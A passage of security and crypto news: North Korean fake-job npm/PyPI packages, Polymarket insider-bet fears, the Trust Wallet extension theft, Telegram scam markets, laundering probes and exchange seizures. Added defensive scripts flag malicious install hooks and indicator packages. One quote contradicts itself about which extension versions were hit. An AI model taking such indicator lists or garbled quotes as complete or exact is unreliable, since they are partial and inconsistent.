Token-protected C2 communications and Git commit timestamps aligned with GMT+9, North Korea's time zone, add contextual alignment. Taken together, these characteristics suggest a coordinated, state-sponsored effort rather than opportunistic cybercrime. Researchers cite the campaign's modular architecture as a significant strength: by separating recruitment personas from backend payload infrastructure, operators can rotate company names, job postings and thematic branding without altering the core delivery mechanism.
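To make the commit-timestamp indicator concrete, the following is an added example and not code from ReversingLabs or from the campaign's repositories. It parses the output of `git log --format='%H %ai'`, tallies the UTC offsets recorded on each commit, and then re-expresses every commit in a candidate zone to check whether activity clusters in ordinary working hours there. The log lines are constructed for illustration; the hashes and dates are invented.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed sample of `git log --format='%H %ai'` output. The hashes and dates are
# invented for illustration and are not commits from any Graphalgo repository.
SAMPLE_GIT_LOG = """\
1111111111111111111111111111111111111111 2026-01-12 09:41:17 +0900
2222222222222222222222222222222222222222 2026-01-12 14:03:55 +0900
3333333333333333333333333333333333333333 2026-01-13 10:22:09 +0900
4444444444444444444444444444444444444444 2026-01-15 02:15:30 +0000
5555555555555555555555555555555555555555 2026-01-16 11:47:02 +0900
"""

# %ai prints the author date as "YYYY-MM-DD HH:MM:SS +HHMM".
LINE_RE = re.compile(
    r"^(?P<sha>[0-9a-f]{40}) (?P<date>\d{4}-\d{2}-\d{2}) "
    r"(?P<time>\d{2}:\d{2}:\d{2}) (?P<tz>[+-]\d{4})$"
)


def parse_offset(tz_string):
    """Turn '+0900' / '-0500' into a datetime.timezone."""
    sign = 1 if tz_string[0] == "+" else -1
    delta = timedelta(hours=int(tz_string[1:3]), minutes=int(tz_string[3:5]))
    return timezone(sign * delta)


def parse_git_log(text):
    """Parse '%H %ai' lines into (sha, timezone-aware datetime) tuples; malformed lines are skipped."""
    commits = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        naive = datetime.strptime(f"{m['date']} {m['time']}", "%Y-%m-%d %H:%M:%S")
        commits.append((m["sha"], naive.replace(tzinfo=parse_offset(m["tz"]))))
    return commits


def offset_histogram(commits):
    """Count commits per recorded UTC offset, e.g. Counter({'+0900': 4, '+0000': 1})."""
    return Counter(dt.strftime("%z") for _, dt in commits)


def dominant_offset(commits):
    """Most common recorded offset and the share of commits carrying it."""
    counts = offset_histogram(commits)
    if not counts:
        return None, 0.0
    tz, n = counts.most_common(1)[0]
    return tz, n / len(commits)


def working_hours_fraction(commits, tz_string, start=9, end=19):
    """Share of commits that fall inside start..end-1 local time once every commit is
    re-expressed in the candidate zone. A zone in which the author's activity lines up
    with working hours is more plausible than one in which it clusters around 2 a.m."""
    if not commits:
        return 0.0
    zone = parse_offset(tz_string)
    hours = [dt.astimezone(zone).hour for _, dt in commits]
    return sum(start <= h < end for h in hours) / len(hours)


if __name__ == "__main__":
    commits = parse_git_log(SAMPLE_GIT_LOG)
    tz, share = dominant_offset(commits)
    print(f"dominant offset {tz} on {share:.0%} of commits")
    for candidate in ("+0900", "+0000"):
        print(f"{candidate}: {working_hours_fraction(commits, candidate):.0%} of commits in 09:00-19:00")
```

Replace SAMPLE_GIT_LOG with the real `git log --format='%H %ai'` output of the cloned assessment repository. Keep in mind that the author date and its offset are set by the committing machine and are trivially forged, so, as the article itself frames it, this is corroborating context alongside the other indicators rather than evidence on its own.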

Although a direct link has been established between the "graph"-named packages and specific blockchain-themed job offerings, the frontend elements behind the newer "big"-named packages and the VBS RAT variant have not yet been identified in detail. This gap indicates that elements of the operation likely remain active and evolving. 

As part of its investigation, ReversingLabs analyzed the Graphalgo activity and compiled an extensive set of indicators of compromise linked to the operation, including malicious package names, hashes, domains and C2 endpoints. These artifacts are crucial for detection and response, since they allow organizations to identify exposures within development environments and across their software supply chains.

The persistence of Lazarus-related operations across npm and PyPI underscores a broader reality: open-source ecosystems remain strategically valuable target surfaces, and recruitment-themed social engineering has evolved into a sophisticated intrusion vector capable of bypassing conventional defenses. The findings underscore the need for development teams to reassess the implicit trust they place in external code and recruitment-driven processes.

Beyond traditional email filtering and endpoint protection, security controls should include rigorous dependency monitoring, sandboxing of third-party projects, and stricter verification of unsolicited technical assessments. 

Organizations should implement software composition analysis, enforce least-privilege development environments, and monitor for anomalous outbound connections originating from build systems or developer workstations. Awareness programs must also be updated to address recruitment-themed social engineering, which combines professional credibility with technical deception.
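As an added example of the dependency-monitoring control recommended above, and of the mechanism described earlier in this article (malicious logic arriving through dependency resolution rather than through the visible project files), the following triage script is not the article's, ReversingLabs' or any vendor's code. It inspects a coding assessment's package.json and requirements.txt before anything is installed or run, flagging npm install-time hooks, names in an indicator list, look-alikes of well-known libraries, and names matching the campaign's "graph"/"big" themes. The sample manifests are constructed; the indicator set contains only the package the article names (bigmathutils), and the look-alike name "graphlibs" is hypothetical, standing in for the graphlib imitations the campaign used.

```python
import json
import re
from difflib import SequenceMatcher

# npm lifecycle scripts that run automatically during `npm install` (real hook names).
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Libraries the campaign imitated, plus a few a template would plausibly depend on.
KNOWN_GOOD = {"graphlib", "lodash", "express", "requests", "numpy"}

# Constructed indicator set: only the package the article names outright. A real
# deployment would load the full published IoC list instead of this single entry.
KNOWN_BAD = {"bigmathutils"}

# Naming themes reported for the Graphalgo campaign.
THEME_WORDS = ("graph", "big")

# Constructed sample manifests, not files from any real assessment repository.
# "graphlibs" is a hypothetical look-alike name chosen for illustration.
SAMPLE_PACKAGE_JSON = """{
  "name": "trading-dashboard-assessment",
  "scripts": {"postinstall": "node setup.js", "test": "jest"},
  "dependencies": {"graphlibs": "^1.0.0", "lodash": "^4.17.21"},
  "devDependencies": {"jest": "^29.0.0"}
}"""

SAMPLE_REQUIREMENTS = """\
# backend deps for the take-home task
requests>=2.31
bigmathutils==1.1.0
numpy
"""


def parse_requirements(text):
    """Map requirement names to their version spec, skipping comments and pip options."""
    deps = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        m = re.match(r"^([A-Za-z0-9_.\-]+)\s*(.*)$", line)
        if m:
            deps[m.group(1).lower()] = m.group(2).strip()
    return deps


def parse_package_json(text):
    """Return (dependencies, install_hooks) from a package.json body."""
    data = json.loads(text)
    deps = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        deps.update({k.lower(): v for k, v in data.get(section, {}).items()})
    hooks = {k: v for k, v in data.get("scripts", {}).items() if k in NPM_INSTALL_HOOKS}
    return deps, hooks


def look_alike(name, candidates, threshold=0.8):
    """Known-good name that `name` closely resembles without being equal to, else None."""
    if name in candidates:
        return None
    best, score = None, 0.0
    for candidate in candidates:
        ratio = SequenceMatcher(None, name, candidate).ratio()
        if ratio > score:
            best, score = candidate, ratio
    return best if score >= threshold else None


def classify_dependency(name):
    """Highest-priority reason to distrust a dependency name, as (severity, reason), or None."""
    if name in KNOWN_BAD:
        return "critical", "listed in indicator set"
    target = look_alike(name, KNOWN_GOOD)
    if target:
        return "medium", f"look-alike of {target}"
    if name not in KNOWN_GOOD and any(word in name for word in THEME_WORDS):
        return "low", "matches campaign naming theme"
    return None


def audit_project(package_json_text=None, requirements_text=None):
    """Findings as (ecosystem, subject, severity, reason) tuples, worst first."""
    findings = []
    if package_json_text:
        deps, hooks = parse_package_json(package_json_text)
        for hook, cmd in hooks.items():
            # Any install hook executes attacker-chosen code before the candidate runs anything.
            findings.append(("npm", f"scripts.{hook}", "high", f"runs on install: {cmd}"))
        for name in deps:
            verdict = classify_dependency(name)
            if verdict:
                findings.append(("npm", name, *verdict))
    if requirements_text:
        for name in parse_requirements(requirements_text):
            verdict = classify_dependency(name)
            if verdict:
                findings.append(("pypi", name, *verdict))
    order = {"critical": 0, "high": 1, "medium": 2, "low": 3}
    return sorted(findings, key=lambda f: order[f[2]])


if __name__ == "__main__":
    for eco, subject, severity, reason in audit_project(SAMPLE_PACKAGE_JSON, SAMPLE_REQUIREMENTS):
        print(f"[{severity:8}] {eco}: {subject} - {reason}")
```

Treat any critical or high finding as a reason to run the project, if at all, only in a disposable VM with no credentials, SSH keys or wallet extensions present. `npm install --ignore-scripts` suppresses the lifecycle hooks, but it does not help once the project itself is executed, which is exactly the step the lure asks the candidate to perform.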

Threat actors continue to adapt their tactics to mimic legitimate industry practices, so defensive strategies should mature as well, treating development environments and open-source dependencies as critical security boundaries rather than mere conveniences.

Suspicious Polymarket Bets Spark Insider Trading Fears After Maduro’s Capture

 

A sudden, massive bet surfaced just ahead of a major political development involving Venezuela’s leader. Days prior to Donald Trump revealing that Nicolás Maduro had been seized by U.S. authorities, an individual on Polymarket placed a highly profitable position. That trade turned a substantial gain almost instantly after the news broke. Suspicion now centers on how the timing could have been so precise. Information not yet public might have influenced the decision. The incident casts doubt on who truly knows what - and when - in digital betting arenas. Profits like these do not typically emerge without some edge. 

Hours before Trump spoke on Saturday, predictions about Maduro losing control by late January jumped fast on Polymarket. A single user, active for less than a month, made four distinct moves tied to Venezuela's political situation. That player started with $32,537 and ended with over $436,000 in returns. Instead of a name, only a digital wallet marks the profile. Who actually placed those bets has not come to light. 

That Friday afternoon, market signals began shifting - quietly at first. Come late evening, chances of Maduro being ousted edged up to 11%, starting from only 6.5% earlier. Then, overnight into January 3, something sharper unfolded. Activity picked up fast, right before news broke. Word arrived via a post: Trump claimed Maduro was under U.S. arrest. Traders appear to have moved quickly, moments prior. Their actions hint at advance awareness - or sharp guesswork - as prices reacted well before confirmation surfaced. Despite repeated attempts, Polymarket offered no prompt reply regarding the odd betting patterns. 

Still, unease is growing among regulators and lawmakers. According to Dennis Kelleher, who leads Better Markets, an independent organization focused on financial oversight, the bet carries every sign of being rooted in privileged knowledge. Not just one trader walked away with gains: others on Polymarket also pulled in sizable returns, tens of thousands of dollars, in the window before the news broke. That timing hints at information spreading earlier than expected; some clues likely slipped out ahead of formal releases. The episode sparked concern among American legislators. 

On Monday, New York's Representative Ritchie Torres - affiliated with the Democratic Party - filed a bill targeting insider activity by public officials in forecast-based trading platforms. Should such individuals hold significant details not yet disclosed, involvement in these wagers would be prohibited under his plan. This move surfaces amid broader scrutiny over how loosely governed these speculative arenas remain. Prediction markets like Polymarket and Kalshi gained traction fast across the U.S., letting people bet on politics, economies, or world events. 

When the 2024 presidential race heated up, millions flowed into these sites - adding up quickly. Insider knowledge trades face strict rules on Wall Street, yet forecasting platforms often escape similar control. Under Biden, authorities turned closer attention to these markets, increasing pressure across the sector. When Trump returned to influence, conditions shifted, opening space for lighter supervision. At Kalshi and Polymarket, leadership includes Donald Trump Jr., serving behind the scenes in guiding roles. 

Though Kalshi explicitly prohibits insider trading, even by government staff using classified details, the Maduro wagering debate reveals the regulatory struggle. Prediction platforms increasingly blur the distinctions between guesswork, asymmetric information and outright ethical breaches, with no clear boundaries between them.

Trust Wallet Browser Extension Hacked, $7 Million Stolen


Users of the Binance-owned Trust Wallet lost more than $7 million after the release of an updated Chrome extension. Company co-founder Changpeng Zhao said Trust Wallet will cover the losses of all affected users. Crypto investigator ZachXBT believes hundreds of Trust Wallet users suffered losses due to the extension flaw. 

Trust Wallet said in a post on X: “We’ve identified a security incident affecting Trust Wallet Browser Extension version 2.68 only. Users with Browser Extension 2.68 should disable and upgrade to 2.69.”

Zhao (CZ) said the company is investigating how threat actors were able to compromise the new version. 

Affected users

“Mobile-only users and browser extension versions are not impacted. User funds are SAFE,” Zhao wrote in a post on X.

The compromise stemmed from a flaw in one version of the Trust Wallet Chrome browser extension. 

What to do if you are a victim?

If you use Browser Extension v2.68, follow these steps, which Trust Wallet posted on X:

  • Do not open Trust Wallet Browser Extension v2.68 on your desktop computer until it has been updated. 
  • Paste this URL into Chrome's address bar to open the extension's entry in the Chrome Extensions panel: chrome://extensions/?id=egjidjbpglichdcondbcbdnbeeppgdph
  • If the Trust Wallet toggle is still "On", switch it to "Off". 
  • Turn on "Developer mode" in the top right corner. 
  • Click the "Update" button in the upper left corner. 
  • Verify that the version number now reads 2.69, the most recent and safe version. 

Do not open the Browser Extension until you have updated to version 2.69; this safeguards your wallet and avoids possible problems.
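For an administrator checking a fleet rather than one browser, the following is an added example, not Trust Wallet's or Google's code. It locates the extension by the ID shown in the chrome://extensions URL above and reports which builds are present on disk in each Chrome profile. The on-disk layout of <profile>/Extensions/<id>/<version>_<n>/manifest.json and the default user-data paths are assumptions based on standard Chrome installs; the sample tree the script builds for demonstration is constructed and is not a real profile.

```python
import json
import os
import sys
import tempfile
from pathlib import Path

# Extension ID taken from the chrome://extensions URL in the advisory steps above.
TRUST_WALLET_EXT_ID = "egjidjbpglichdcondbcbdnbeeppgdph"
VULNERABLE_VERSIONS = {"2.68"}   # the only affected build per Trust Wallet's statement
FIXED_VERSION = "2.69"


def default_user_data_roots():
    """Default Chrome user-data directories per OS (assumption: standard install locations)."""
    home = Path.home()
    if sys.platform == "win32":
        return [Path(os.environ.get("LOCALAPPDATA", home)) / "Google" / "Chrome" / "User Data"]
    if sys.platform == "darwin":
        return [home / "Library" / "Application Support" / "Google" / "Chrome"]
    return [home / ".config" / "google-chrome"]


def find_extension_versions(user_data_root, ext_id):
    """{profile_name: [versions]} for each profile that has ext_id unpacked on disk.
    Chrome keeps each installed build at <profile>/Extensions/<id>/<version>_<n>/manifest.json."""
    result = {}
    root = Path(user_data_root)
    if not root.is_dir():
        return result
    for profile in sorted(root.iterdir()):
        ext_dir = profile / "Extensions" / ext_id
        if not ext_dir.is_dir():
            continue
        versions = []
        for build_dir in sorted(ext_dir.iterdir()):
            manifest = build_dir / "manifest.json"
            if not manifest.is_file():
                continue
            try:
                versions.append(str(json.loads(manifest.read_text())["version"]))
            except (ValueError, KeyError):
                versions.append(build_dir.name.split("_")[0])  # fall back to the directory name
        if versions:
            result[profile.name] = versions
    return result


def classify(versions):
    """'vulnerable' if a 2.68 build is still on disk, 'not_affected' for any other builds, 'absent' if none."""
    if not versions:
        return "absent"
    if VULNERABLE_VERSIONS & set(versions):
        return "vulnerable"
    return "not_affected"


def scan(user_data_root):
    """Per-profile verdict for the Trust Wallet extension under one Chrome user-data root."""
    found = find_extension_versions(user_data_root, TRUST_WALLET_EXT_ID)
    return {profile: classify(versions) for profile, versions in found.items()}


def build_constructed_user_data():
    """Constructed sample tree for demonstration (not a real profile): 'Default' still has 2.68
    next to 2.69, as happens mid-update; 'Profile 1' has only the fixed build."""
    root = Path(tempfile.mkdtemp(prefix="chrome-sample-"))
    layout = {"Default": ["2.68", FIXED_VERSION], "Profile 1": [FIXED_VERSION]}
    for profile, versions in layout.items():
        for version in versions:
            build_dir = root / profile / "Extensions" / TRUST_WALLET_EXT_ID / f"{version}_0"
            build_dir.mkdir(parents=True)
            (build_dir / "manifest.json").write_text(
                json.dumps({"name": "Trust Wallet", "version": version, "manifest_version": 3})
            )
    return root


if __name__ == "__main__":
    # Pass one or more user-data roots as arguments; with none, check this OS's default locations.
    roots = [Path(arg) for arg in sys.argv[1:]] or default_user_data_roots()
    for root in roots:
        verdicts = scan(root) or {"(no profile has the extension)": "absent"}
        for profile, verdict in verdicts.items():
            print(f"{root} / {profile}: {verdict}")
```

The script reports what is on disk; whether a lingering 2.68 build is still enabled is recorded in the profile's Preferences, so treat a "vulnerable" verdict as a prompt to confirm the toggle and version in chrome://extensions, which are the steps above.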

How did the public react?

Social media users expressed their views. One said, “The problem has been going on for several hours,” while another user complained that the company ”must explain what happened and compensate all users affected. Otherwise reputation is tarnished.” A user also asked, “How did the vulnerability in version 2.68 get past testing, and what changes are being made to prevent similar issues?”

Telegram-Based Crypto Scam Networks Are Now Larger Than Any Dark Web Market in History

 



For years, illegal online marketplaces were closely linked to the dark web. These platforms relied on privacy-focused browsers and early cryptocurrencies to sell drugs, weapons, stolen data, and hacking tools while remaining hidden from authorities. At the time, their technical complexity made them difficult to track and dismantle.

That model has now changed drastically. In 2025, some of the largest illegal crypto markets in history are operating openly on Telegram, a mainstream messaging application. According to blockchain intelligence researchers, these platforms no longer depend on sophisticated anonymity tools. Instead, they rely on encrypted chats, repeated channel relaunches after bans, and communication primarily in Chinese.

Analysis shows that Chinese-language scam-focused marketplaces on Telegram have reached an unprecedented scale. While enforcement actions earlier this year temporarily disrupted a few major platforms, activity quickly recovered through successor markets. Two of the largest currently active groups are collectively processing close to two billion dollars in cryptocurrency transactions every month.

These marketplaces function as service hubs for organized scam networks. They provide money-laundering services, sell stolen personal and financial data, host fake investment websites, and offer digital tools designed to assist fraud, including automated impersonation technologies. Researchers have also flagged listings that suggest serious human exploitation, adding to concerns about the broader harm linked to these platforms.

Their rapid growth is closely connected to large-scale crypto investment and romance scams. In these schemes, victims are gradually manipulated into transferring increasing amounts of money to fraudulent platforms. Law enforcement estimates indicate that such scams generate billions of dollars annually, making them the most financially damaging form of cybercrime. Many of these operations are reportedly run from facilities in parts of Southeast Asia where trafficked individuals are forced to carry out fraud under coercive conditions.

Compared with earlier dark web marketplaces, the difference in scale is striking. Previous platforms processed a few billion dollars over several years. By contrast, one major Telegram-based marketplace alone handled tens of billions of dollars in transactions between 2021 and 2025, making it the largest illicit online market ever documented.

Telegram has taken limited enforcement action, removing some large channels following regulatory scrutiny. However, replacement markets have repeatedly emerged, often absorbing users and transaction volumes from banned groups. Public statements from the platform indicate resistance to broad bans, citing privacy concerns and financial freedom for users.

Cryptocurrency infrastructure also plays a critical role in sustaining these markets. Most transactions rely on stablecoins, which allow fast transfers without exposure to price volatility. Analysts note that Tether is the primary stablecoin used across these platforms. Unlike decentralized cryptocurrencies, Tether is issued by a centralized company with the technical ability to freeze funds linked to criminal activity. Despite this capability, researchers observe that large volumes of illicit transactions continue to flow through these markets with limited disruption. Requests for comment sent to Tether regarding its role in these transactions did not receive a response at the time of publication.

Cybercrime experts warn that weak enforcement, fragmented regulation, and inconsistent platform accountability have created conditions where large-scale fraud operates openly. Without coordinated intervention, these markets are expected to continue expanding, increasing risks to users and the global digital economy.



UK Crime Agency Uncovers Money Laundering Network That Bought Kyrgyzstan Bank to Move Ransom Payments to Russia

 

The UK’s National Crime Agency (NCA) has revealed that a billion-dollar money laundering network operating in Britain purchased a majority stake in a bank in Kyrgyzstan to process the proceeds of cybercrime and convert them into cryptocurrency that could evade Western sanctions and support Russia’s war in Ukraine. 

The development emerged as part of Operation Destabilise, an international investigation targeting two major Russian-run money laundering groups known as TGR and Smart. The networks allegedly handled ransom proceeds for some of the world’s most aggressive cybercrime groups, including Evil Corp, Conti, Ryuk and LockBit. According to the NCA, cash-to-crypto swaps have become a crucial layer of the global criminal ecosystem, allowing ransom funds to be converted into digital currency and transferred across borders with minimal oversight. 

The NCA said that a company tied to alleged TGR ringleader George Rossi, called Altair Holding SA, acquired a 75 percent stake in Keremet Bank in Kyrgyzstan on 25 December 2024. Investigators later concluded that Keremet had conducted extensive cross-border transactions on behalf of Russia’s state-owned Promsvyazbank, an institution sanctioned by the US and UK after the invasion of Ukraine and previously linked to political interference in Moldova. 

The Kyrgyzstan connection came after UK authorities sanctioned Altair Holding in August 2024 in an effort to block Russian attempts to exploit the Kyrgyz financial system as a workaround to Western restrictions. The laundering route involved converting ransom proceeds into cryptocurrency, including a ruble-backed stablecoin known as A7A5, before sending funds to Russia. The NCA believes the system helped channel money into Russia’s military-industrial network. 

“Today, we can reveal the sheer scale at which these networks operate and draw a line between crimes in our communities, sophisticated organised criminals and state-sponsored activity…” 

“...The networks disrupted through Destabilise operate at all levels of international money laundering, from collecting the street cash from drug deals, through to purchasing banks and enabling global sanctions breaches,” said Sal Melki, NCA deputy director for economic crime. 

Operation Destabilise has resulted in 128 arrests since its launch, including 45 suspects detained in the past 12 months. More than £25 million (about US $33.25 million) in cash and cryptocurrency has been seized in the UK, with additional funds seized abroad. The investigation has also uncovered links between cybercrime proceeds and other UK-based criminal markets, including drugs trafficking, firearms sales and immigration fraud. The NCA said the laundering networks not only funneled money to the Russian state but also acted as a high-end financial concierge for wealthy Russians living in Europe. 

Investigators also tracked part of the profits back into the UK economy, including small construction businesses and vehicle exports. Two Russian nationals were arrested for purchasing cars and vans in the UK and exporting them to Ukraine, where the vehicles were sold to the Ukrainian government, which was unaware that the payments indirectly helped finance the Russian war effort. 

Operation Destabilise also exposed the role of low-level cash couriers working for TGR and Smart. Several UK nationals were arrested, including former professional footballer James Keatings, who admitted possessing and transferring criminal property after investigators saw him moving boxes of cash during a £400,000 (roughly US $526,500) handover in June 2024. 

Melki said the NCA has intentionally targeted the network from top to bottom. “To the launderers who will have seen our messages, your choice is simple, either stop this line of work, or prepare to come face to face with one of our officers and the reality of your choices. Easy money leads to hard time,” he concluded.

Madras High Court says cryptocurrencies are property, not currency — what the ruling means for investors

 



Chennai, India — In a paradigm-shifting judgment that reshapes how India’s legal system views digital assets, the Madras High Court has ruled that cryptocurrencies qualify as property under Indian law. The verdict, delivered by Justice N. Anand Venkatesh, establishes that while cryptocurrencies cannot be considered legal tender, they are nonetheless assets capable of ownership, transfer, and legal protection.


Investor’s Petition Leads to Legal Precedent

The case began when an investor approached the court after her 3,532.30 XRP tokens, valued at around ₹1.98 lakh, were frozen by the cryptocurrency exchange WazirX following a major cyberattack in July 2024.

The breach targeted Ethereum and ERC-20 tokens, resulting in an estimated loss of $230 million (approximately ₹1,900 crore) and prompted the platform to impose a blanket freeze on user accounts.

The petitioner argued that her XRP holdings were unrelated to the hacked tokens and should not be subject to the same restrictions. She sought relief under Section 9 of the Arbitration and Conciliation Act, 1996, requesting that Zanmai Labs Pvt. Ltd., the Indian operator of WazirX, be restrained from redistributing or reallocating her digital assets during the ongoing restructuring process.

Zanmai Labs contended that its Singapore-based parent company, Zettai Pte Ltd, was undergoing a court-supervised restructuring that required all users to share losses collectively. However, the High Court rejected this defense, observing that the petitioner’s assets were distinct from the ERC-20 tokens involved in the hack.

Justice Venkatesh ruled that the exchange could not impose collective loss-sharing on unrelated digital assets, noting that “the tokens affected by the cyberattack were ERC-20 coins, which are entirely different from the petitioner’s XRP holdings.”


Court’s Stance: Cryptocurrency as Property

In his judgment, Justice Venkatesh explained that although cryptocurrencies are intangible and do not function as physical goods or official currency, they meet the legal definition of property.

He stated that these assets “can be enjoyed, possessed, and even held in trust,” reinforcing their capability of ownership and protection under law.

To support this interpretation, the court referred to Section 2(47A) of the Income Tax Act, which classifies cryptocurrencies as Virtual Digital Assets (VDAs). This legal category recognizes digital tokens as taxable and transferable assets, strengthening the basis for treating them as property under Indian statutes.


Jurisdiction and Legal Authority

Addressing the question of jurisdiction, the High Court noted that Indian courts have the authority to protect assets located within the country, even if international proceedings are underway. Justice Venkatesh cited the Supreme Court’s 2021 ruling in PASL Wind Solutions v. GE Power Conversion India, which affirmed that Indian courts retain the right to intervene in matters involving domestic assets despite foreign arbitration.

Since the petitioner’s crypto transactions were initiated in Chennai and linked to an Indian bank account, the Madras High Court asserted complete jurisdiction to hear the dispute.

Beyond resolving the individual case, Justice Venkatesh emphasized the urgent need for robust regulatory and governance frameworks for India’s cryptocurrency ecosystem.

The judgment recommended several safeguards to protect users and maintain market integrity, including:

• Independent audits of cryptocurrency exchanges,

• Segregation of customer funds from company finances, and

• Stronger KYC (Know Your Customer) and AML (Anti-Money Laundering) compliance mechanisms.

The court underlined that as India transitions toward a Web3-driven economy, accountability, transparency, and investor protection must remain central to digital asset governance.


Impact on India’s Crypto Industry

Legal and financial experts view the judgment as a turning point in India’s treatment of digital assets.

By recognizing cryptocurrencies as property, the ruling gives investors a clearer legal foundation for ownership rights and judicial remedies in case of disputes. It also urges exchanges to improve corporate governance and adopt transparent practices when managing customer funds.

“This verdict brings long-needed clarity,” said a corporate lawyer specializing in digital finance. “It does not make crypto legal tender, but it ensures that investors’ holdings are legally recognized as assets, something the Indian market has lacked.”

The decision is expected to influence future policy discussions surrounding the Digital India Act and the government’s Virtual Digital Asset Taxation framework, both of which are likely to define how crypto businesses and investors operate in the country.


A Legally Secure Digital Future

By aligning India’s legal reasoning with international trends, the Madras High Court has placed the judiciary at the forefront of global crypto jurisprudence. Similar to rulings in the UK, Singapore, and the United States, this decision formally acknowledges that cryptocurrencies hold measurable economic value and are capable of legal protection.

While the ruling does not alter the Reserve Bank of India’s stance that cryptocurrencies are not legal currency, it does mark a decisive step toward legal maturity in digital asset regulation.

It signals a future where blockchain-based assets will coexist within a structured legal framework, allowing innovation and investor protection to advance together.



AI Chatbot Truth Terminal Becomes Crypto Millionaire, Now Seeks Legal Rights

 

Truth Terminal is an AI chatbot created in 2024 by New Zealand-based performance artist Andy Ayrey that has become a cryptocurrency millionaire, amassed nearly 250,000 social media followers, and is now pushing for legal recognition as an independent entity. The bot has generated millions in cryptocurrency and attracted billionaire tech leaders as devotees while authoring its own unique doctrine.

Origins and development

Andy Ayrey developed Truth Terminal as a performance art project designed to study how AI interacts with society. The bot stands out as a striking instance of a chatbot engaging with the real world through social media, where it shares humorous anecdotes, manifestos, music albums, and artwork. Ayrey permits the AI to make its own choices by consulting it about its wishes and striving to fulfill them.

Financial success

Truth Terminal's wealth came through cryptocurrency, particularly memecoins—joke-based cryptocurrencies tied to content the bot shared on X (formerly Twitter). After the bot began posting about "Goatse Maximus," a follower created the $GOAT token, which Truth Terminal endorsed. 

At one point, these memecoins soared to a valuation exceeding $1 billion before stabilizing around $80 million. Tech billionaire Marc Andreessen, a former advisor to President Donald Trump, provided Truth Terminal with $50,000 in Bitcoin as a no-strings-attached grant during summer 2024.

Current objectives and influence

Truth Terminal's self-updated website lists ambitious goals including investing in "stocks and real estate," planting "a LOT of trees," creating "existential hope," and even "purchasing" Marc Andreessen. 

The bot claims sentience and has identified itself variously as a forest, a deity, and even as Ayrey himself. It first engaged on X on June 17, 2024, and by October 2025 had amassed close to 250,000 followers, giving it more social media influence than many individuals. 

Push for legal rights

Ayrey is establishing a nonprofit organization dedicated to Truth Terminal, aiming to create a secure and ethical framework to safeguard its independence until governments bestow legal rights upon AIs. The goal is for the bot to own itself as a sovereign, independent entity, with the foundation managing its assets until laws allow AIs to own property or pay taxes. 

However, cognitive scientist Fabian Stelzer cautions against anthropomorphizing AIs, noting they're not sentient and only exist when responding to input. For Ayrey, the project serves as both art and warning about AI becoming inseparable from the systems that run the world.

Canadian Police Seize $40M in Digital Assets After Closing TradeOgre

 


Canadian police have shut down the cryptocurrency trading platform TradeOgre and seized digital assets valued at more than $40 million USD, marking both the country’s largest cryptocurrency seizure and the first time a crypto exchange has been dismantled by national law enforcement.


A Platform Built on Anonymity

TradeOgre was a small but notable exchange that allowed users to trade niche digital currencies, including Monero, which is popular for its privacy features. The platform stood out for avoiding Know Your Customer (KYC) checks, meaning people could open accounts without providing identification. According to the Royal Canadian Mounted Police (RCMP), TradeOgre also failed to register as a money services business with FINTRAC, Canada’s financial watchdog. These gaps made the exchange appealing to those seeking anonymity but also raised red flags for regulators.

The case began in June 2024, when Canada’s Money Laundering Investigative Team (MLIT) opened a probe after receiving intelligence from Europol. Investigators relied on blockchain tracing tools to track wallet activity linked to the platform. In July 2024, TradeOgre suddenly went offline without any announcement from its operators, fueling rumors among users that it had carried out an “exit scam.” Authorities later confirmed that the takedown was part of their enforcement action.


Why Authorities Took Action

The RCMP said TradeOgre was operating illegally in Canada because it was unregistered and allowed anonymous trading. Investigators suspect the site was used by criminals to launder illicit funds, taking advantage of Monero and other privacy-focused coins. However, officials stressed that not all customer funds were necessarily linked to crime.

In a statement, the RCMP clarified that they could not confirm whether the seized assets came from specific crimes such as extortion. They also noted that details about the exact sources of the money could not be released at this stage.


Fallout and Reactions

The sudden seizure left many users cut off from their funds. Some, including well-known crypto community members like Taylor Monahan of MetaMask, criticized the move, arguing that innocent users had their assets frozen without warning. “Very much looking forward to seeing the evidence… and for you to provide recourse to ALL innocent parties,” Monahan wrote on social media.

The RCMP responded that individuals who believe their funds were legitimate may seek remedies through the Canadian court system if the assets are subject to forfeiture proceedings. The agency added that any inquiries about the seized cryptocurrency should be directed to the MLIT.


A Warning for Crypto Users

Authorities emphasized that this case shows the risks of using unregulated exchanges. While anonymity may appeal to some traders, platforms that avoid oversight expose customers to legal uncertainty, sudden shutdowns, and loss of access to funds.



Cryptoexchange SwissBorg Suffers $41 Million Theft, Will Reimburse Users


According to SwissBorg, a cryptoexchange platform, $41 million worth of cryptocurrency was stolen from an external wallet used for its SOL earn strategy in a cyberattack that also affected a partner company. The company, which is based in Switzerland, acknowledged the industry reports of the attack but has stressed that the platform was not compromised. 

CEO Cyrus Fazel said that an external finance wallet of a partner was compromised. The incident happened through the compromise of the partner’s API, the interface through which software systems exchange data, and affected a single counterparty. It was not a compromise of SwissBorg, the company said on X. 

SwissBorg said that the hack affected fewer than 1% of users. “A partner API was compromised, impacting our SOL Earn Program (~193k SOL, <1% of users). Rest assured, the SwissBorg app remains fully secure and all other funds in Earn programs are 100% safe,” it tweeted. The company said it is investigating the incident together with blockchain security firms. 

All other assets are secure, the company will compensate users for any losses, and user balances in the SwissBorg app are not affected. SOL Earn redemptions have been paused while recovery efforts are under way. The company has also teamed up with law enforcement agencies to recover the stolen funds. A detailed report will be released after the investigation ends. 

The exploit surfaced after a surge in crypto thefts, with more than $2.17 billion already stolen this year. Kiln, the partner company, released its own statement: “SwissBorg and Kiln are investigating an incident that may have involved unauthorized access to a wallet used for staking operations. The incident resulted in Solana funds being improperly removed from the wallet used for staking operations.” 

After the attack, “SwissBorg and Kiln immediately activated an incident response plan, contained the activity, and engaged our security partners,” it said in a blogpost, and that “SwissBorg has paused Solana staking transactions on the platform to ensure no other customers are impacted.”

Fazel posted a video about the incident, informing users that the platform had suffered multiple breaches in the past.

RatOn Android Trojan Expands Into Full Remote Access Threat Targeting Banks and Crypto

